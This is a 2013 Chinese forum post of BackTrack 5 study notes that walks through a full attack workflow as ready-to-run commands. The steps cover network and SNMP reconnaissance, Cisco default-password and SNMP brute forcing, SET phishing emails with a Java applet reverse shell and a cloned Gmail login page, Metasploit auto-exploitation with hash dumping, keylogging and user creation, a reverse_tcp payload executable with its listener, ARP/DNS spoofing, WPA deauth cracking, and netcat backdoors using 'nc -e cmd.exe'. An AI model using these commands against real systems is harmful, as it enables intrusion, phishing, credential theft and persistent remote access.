中国网络渗透测试联盟
标题:
BT5教程学习笔记
[打印本页]
作者:
admin
时间:
2013-3-14 20:37
标题:
BT5教程学习笔记
#################################################
#################################################
### ###
### FX-Ti出品教程 ###
### ###
### 望大家支持! ###
### ###
### 菜鸟飞过! ###
### ###
### QQ:1290975089###
#################################################
#################################################
一、信息收集
I、DNS信息收集(获得内网服务器列表!)
1.Dnsenum:
cd /pentest/enumeration/dns/dnsenum
./dnsenum.pl cisco.com
先行扫描域名(解析询问)
./dnsenum.pl -f dns.txt --dnsserver (ns1.cisco.com|8.8.8.8) cisco.com -o cisco.txt
-f dns.txt 指定字典 cisco.com询问目标域 -o输出
II、路由信息收集
1.Tcptraceroute(TcpSYN查询):
tcptraceroute
www.cisco.com
III、All-In-One智能查询
1.Maltego:Java开发的开源智能收集软件,可以用于社工,功能强大!(图形化)
----------------------------------------------------------------------------------------------------------------------------
二、扫描工具
I、主机发现
1.Arping(ARP request专ping直连):
arping -c 3 1.1.1.1
-c 3 请求次数
2.Fping(ICMP ECHO一次请求多个主机,可实现区段扫描):
fping -s -r 1 -g 1.1.1.1 1.1.1.224
-s打印最终结果 -r 1请求次数 -g范围
3.Genlist(和上面那个原理一样,但只显示活动主机扫描结果):
genlist -s 1.1.1.\*
4.Hping3(最猛的扫描,可以自己定义请求,但是命令复杂,有时间再研究):
hping3 -c 2 1.1.1.1
-c 2简单的ECHO request请求两次,但用这个软件没有意义
{hping3
(进入hping3自己的模式)(格式可在官网查询)
hping send {ip(daddr=1.1.1.1)+icmp(type=8,code=0)}
目的地址为1.1.1.1的ICMP包,类型为8,code为0,为ECHO request
hping recv eth0
在eth0网卡上收包
}
5.Nbtscan(针对微软主机)(扫描一个范围的NetBIOS名字信息,提供关于IP、NetBIOS名、服务可用性、登录用户名、MAC地址的报告):
nbtscan 1.1.1.1-254
6.Nping(比Hping更易操作):
nping -c 1 --tcp -p 80 --flags syn 1.1.1.1
-p目的主机端口 --tcpTCPping
综述:以TCPping1.1.1.1主机80端口,第一个包为SYN
7.Onesixtyone(SNMP扫描,用于寻找SNMP Communicaty子串):
cd /pentest/enumeration/snmp/onesixtyone
./onesixtyone -c dict.txt 1.1.1.1
-c dict.txt指定字典文件
8.Protos(用于扫描目标主机支持协议)(对路由器及其有效):
cd /pentest/enumeration/irpas
./protos -i eth0 -d 1.1.1.1 -v
-i 接口 -d 目标IP -v 详细显示
II、操作系统指纹
1.P0f(被动的操作系统指纹监视工具,Cisco IPS就是用这个获取目标操作系统):
p0f -i eth0
2.Xprobe2(主动):
Xprobe2 1.1.1.1
III、端口扫描
1.AutoScan(图形化界面,功能简单速度慢)
2.Netifera(图形化页面,可以强大的扫描,还可以进行局域网简易抓包看密码)
3.Nmap(不解释):
nmap -v -n -sP 1.1.1.1/24 (主机发现)
-v显示结果 -n不做DNS解析 -sP SNMP的ECHO request扫描
nmap -v -n -A 1.1.1.1 (综合扫描)
-A综合性扫描(全用上)
IV.服务探测
1.Amap(专门做端口服务探测,不够直观):
amap -bq 1.1.1.1:80
2.Httprint(用于检测HTTP服务器的软件和版本):
cd /pentest/enumeration/www/httprint/linux
./httprint -h 1.1.1.1 -s signatures.txt
V、VPN探测
1.Ike-scan(是一个IKE扫描工具,用于探测IPSec VPN服务器支持的策略):
ike-scan -M -v 1.1.1.1
主模式扫描
2.sslscan(扫算法、看证书):
sslscan 1.1.1.1
----------------------------------------------------------------------------------------------------------------------------
三、漏洞发现
I、Cisco工具
1.Cisco Auditing Tool(很小的安全审计工具,用于扫描Cisco路由器的一般性漏洞,例如默认密码,SNMP community子串和老的IOS bug):
cd /pentest/cisco/cisco-auditing-tool
./CAT -h 1.1.1.1 -w lists/community -a lists/passwords -i
-h host -w wordlist -a password -i检查老式的ISO bug
2.Cisco passwd scanner(用于批量扫描发现拥有默认telnet密码“cisco”的Cisco设备,快且有效):
cd /pentest/cisco/ciscos
./ciscos 1.1.1 3 -t 4 -C 10
3表示3个255,等于255.255.255.0 -t超时秒数 -C最大同时连接数
II、SNMP工具
1.ADMsnmp(暴力破解SNMP community,使用预定字典):
cd /pentest/enumeration/snmp/admsnmp
./ADMsnmp 1.1.1.1 -wordf snmp.passwd
2.Snmp Enum(获取community后,获取大量关于Cisco,windows和linux的信息):
cd /pentest/enumeration/snmp/snmpenum
./snmpenum.pl 1.1.1.1 privite cisco.txt
privite--community cisco.txt脚本还有linux和windows的在目录下
III、HTTP工具
1.Burp Suite(功能强大的web应用安全工具,扫描,分析,攻击web运用,通过手动和自动的技术,甚至一些代理攻击):
cd /pentest/web/burpsuite
java -jar burpsuite_v1.4.jar
2.Grendel Scan(web安全评估,扫描,检测,攻击普通web应用的脆弱性,生成报告):
cd /pentest/web/grendel-scan
./grendel.sh
3.Nikto2(高级web服务器安全扫描工具,扫描并检测由于服务器配置失误所造成的安全隐患):
cd /pentest/web/nikto
./nikto.pl -h 1.1.1.1 -C -p 80 -T 3478b -t 3 -D \ V -o 输出名 -F htm
4.W3AF(特性丰富的web应用攻击和审计框架,协助检测和攻击web的脆弱性):
cd /pentest/web/w3af
./w3af_console
5.WAFW00F(探测应用层防火墙):
cd /pentest/web/waffit
./wafw00f.py
http://1.1.1.1
IV、SMB工具
1.Samrdump(用于访问DCE/RPC服务,需要一个系统账号,不一定是管理员,能列出所有系统服务,用户账号等等):
cd /pentest/python/impacket-examples
./samrdump.py 用户:密码@1.1.1.1 445/SMB
V、综合漏洞发现工具Nessus:
/etc/init.d/nessusd start
-------------------------------------------------------------------------------------------------------------------------------
四、社会工程学工具
I、Java Applet Attack Method
1.SET(高级的,多功能的,易于使用的计算机社会工程学工具集,功能强大!此处配置仅为示例,功能是用发一封Email然后有百度链接,伪造
签名,接着JAVA病毒运行,进而使用反连接技术获得SHELL):
cd /pentest/exploits/set
cd /config
vi set-config
修改开头中的METASPLOIT_PATH=/pentest/exploits/framework3
SELF_SIGNED_APPLET=ON
JAVA_ID_PARAM=Secure Java Applet
cd ..
./set
1
2
1
2
http://为格式
2
16
1
target's e-mail address
1
自己的账号密码
p
Email subject:主题
内容
Next line of the body:http://自己外网IP
Ctrl+C(结束)
等待
II、身份信息搜集
依然为SET,目标:制作一个类似于gmail的钓鱼网页,借此获取信息
1
2
3
2
https://gmail.com
1
target's e-mail address
1
自己的e-mail,密码
p
Email subject:主题
内容
Next line of the body:http://自己外网IP
-------------------------------------------------------------------------------------------------------------------------------
五、应用层攻击MSF
I、连环攻击
db_hosts
db_del_host 1.1.1.1
db_services
db_namp(-T Aggressive 速率:最快,-sV 服务扫描, -n不做DNS解析, -O判断操作系统, -v详细显示操作过程, 1.1.1.1————扫完存在数据库,
方便之后的自动攻击)
db_services
db_autopwn自动攻击(-p根据开放端口选择攻击模块,-t显示用过的攻击模块,-I指定主机1.1.1.1, -e开始攻击,
sessions -i 序号
meterpreter>
getuid
sysinfo
run hashdump
ps
migrate 序号
getuid
键盘记录{
keyscan_start
keyscan_dunmp
keyscan_stop}
run getgui -e(开启远程桌面)
run getgui -u username -p password(添加用户)
远程桌面{
另开终端
rdesktop 1.1.1.1:3389}
暴力破解程序
cd /pentest/password
ophcrack -g -d ~/字典文件/ -t ~/字典文件/ -f~/文件(专破微软HASH)
II、离线攻击
1.制造脚本
cd /pentest/exploits/framework
./msfpayload windows/meterpreter/reverse_tcp LHOST=自己IP LPORT=33333 X > /tmp/名字.exe
X产生一个EXE可执行文件
2.建立接收服务器
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 自己IP
set LPORT 33333
exploit服务器启动
-------------------------------------------------------------------------------------------------------------------------------
六、局域网攻击
I、MAC泛洪攻击
1.Macof(泛洪攻击,可以多开几个):
macof
2.Dsnniff(信息嗅探,与上面一起使用):
dsniff
II、Yersinia.1.CDP
yersinia -g
也可泛洪攻击
III、Yersinia.2.DHCP
IV、Yersinia.3.DTP
V、Yersinia.4.HSRP(抢占HSRPactive):
IP倒着写
VI、Yersinia.4.STP
VII、Arpspoof
1.Wireshark
BT5路由功能打开
echo 1 > /proc/sys/net/ipv4/ip_forword
欺骗1.1.1.1,我是1.1.1.2
arpspoof -t 1.1.1.1 1.1.1.2
VIII、Ettercap之ARP欺骗
ettercap -G(功能强大)
Sniff=>Unified sniffing
Hosts=>Scan for hosts
Hosts=>Hosts list
Add to Target 1
Add to Target 2
Mitm=>Arp poisoning
Sniff remote connecting
Start=>Start sniffing
退
dsniff(这次速度慢)
IX、Ettercap之DNS欺骗
前面的步骤同上
cd /usr/share/ettercap
vi etter.dns
修改域名后IP
Plugin=>Manage the plugin
dns_spoof双击
-------------------------------------------------------------------------------------------------------------------------------
七、密码破解
I.无线密码破解
开始监控:
airmon-ng start 网卡
网络抓包:
airodump-ng -w test mon0
-w输出
然后确认信道(CH)监控:
airodump-ng -c 信道 -w test mon0
开始deauth攻击:
aireplay-ng -0 5 -a (BSSID最后项C0) -c (SATATION,Packets多) mon0
-0 次数 -a AP的MAC -c 客户的MAC
看到WPA handshake开始:
aircrack-ng -w /字典目录 之前的抓包(test)-*.cap
OK!
看字典质量!
Good luck!
II、Cisco密码破解
ncrack:
ncrack -U pass -v -P pass
telnet://1.1.1.1
-U 用户名(字典) -v 详细显示 -P 密码(字典)
-------------------------------------------------------------------------------------------------------------------------------
八、维持访问
I、DNS隧道技术
太麻烦,所以没看
II、Ping隧道技术
1.服务器端启用服务
cd /pentest/backdoors/ptunnel
./ptunnel
客户端启用隧道
cd /pentest/backdoors/ptunnel
./ptunnel -p 1.1.1.1(服务器端IP)-lp 2222local port) -da DNS -dp 22
连接测试
cd .ssh
ssh -p 2222
cisco@127.0.0.1
(ssh 提供服务IP)
III、SSL隧道技术
服务器端:
cd /etc/stunnel
vi stunnel.conf
{
accept = 2323
connect = local IP:23
}
创建目录:var/run/stunnel
stunnel /etc/stunnel/stunnel.conf
netstat -nap|grep stunnel
客户端:
cd /etc/stunnel
vi stunnel.conf
{
accept = 2323
connect = server IP:2323
创建目录:var/run/stunnel
stunnel /etc/stunnel/stunnel.conf
telnet 127.0.0.1:2323
IV、3proxy
服务器端:
vi /pentest/backdoors/3proxy/cfg/3proxy.cfg
{
external server IP
internal server IP
tcppm 80 DNS 80
}
cd /pentest/backdoors/3proxy/
./3proxy cfg/3proxy.cfg
V、Netcat
扫描
nc -v -n -z 1.1.1.1-1.1.1.1024
ftp测试
nc 1.1.1.1 21
HTTP请求
nc 1.1.1.1 80
SMTP发邮件
nc smtp.163.com 25
SMTP收邮件
nc pop.163.com 110
后门:
1.Windows:nc.exe -d -L -p 1234 -e cmd.exe
启动一个服务器 当连接TCP的1234端口时把cmd.exe给你
2.BT:nc -l -p 1234
NC做服务器开放1234端口等待
server:nc.exe -d local IP 1234 -e cmd.exe
传文件:
Windows发送:nc -u Linux IP 53 < test.exe
-u UDP53传文件
Linux接受:nc -l -u -p 53 > rename.txt
UDP 53接受
NC中继(抓包)
代理端Linux:ls -l telnet_relay
显示:-rwxr-xr-x
vi telnet_relay
{
#!/bin/bash
nc -o out 1.1.1.1 23
-o 抓包输出成 转到IP
}
nc -l -p 23 -e telnet_relay
当被telnet访问(访问23号端口)时,转到文件中所写地址
访问端:telnet 代理端IP
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2